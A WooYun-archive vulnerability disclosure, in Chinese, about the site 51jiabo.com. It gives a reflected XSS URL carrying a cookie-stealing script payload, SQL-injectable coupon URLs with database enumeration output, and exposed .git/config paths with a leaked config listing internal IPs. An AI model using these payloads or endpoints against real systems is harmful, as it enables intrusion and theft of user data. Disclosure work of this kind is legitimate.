乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-03-21: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-05-05: 厂商已经主动忽略漏洞,细节向公众公开
RT.
#1 XSS 完全没有过滤的节奏呀有木有
http://sh.51jiabo.com/member/login.shtml?redirect_url=b3JkZXIvc2FsZQ==%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
#2 SQL注入
http://zz.51jiabo.com/get_special_coupon?code_id=2
http://qd.51jiabo.com/get_special_coupon?code_id=2
http://sh.51jiabo.com/get_special_coupon?code_id=2
current user: '[email protected].%'
current database: 'hxjb_user'
available databases [4]:[*] hxjb_manage[*] hxjb_user[*] information_schema[*] test
98万用户数据泄露
可拖库
#3 应用配置错误整站源码+数据库敏感信息泄露
http://www.ticket.51jiabo.com/.git/config
http://gz.ticket.51jiabo.com/.git/config
http://ks.ticket.51jiabo.com/.git/config ...
数据库信息泄露
然而并不能外联部分敏感信息
<?php if ( ! defined('BASEPATH')) exit('No direct script access allowed');# 测试// $config['API_BURL'] = 'http://test.api.51jiabo.com:8080/hxjb/'; // 测试接口基础路径# 正式$config['API_BURL'] = 'https://api.51jiabo.com/hxjb/'; // 接口基础路径 $config['SMS_LINK'] = 'http://172.16.1.33:8888/sms/send.do'; // 短信通道$config['SEND_SMS_LINK'] = 'http://172.16.1.33:8888/sms/sendSms.do'; // 模板短信通道# LOG Host$config['LOG_BURL'] = 'http://172.16.1.68:8080/'; // LOG Host
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)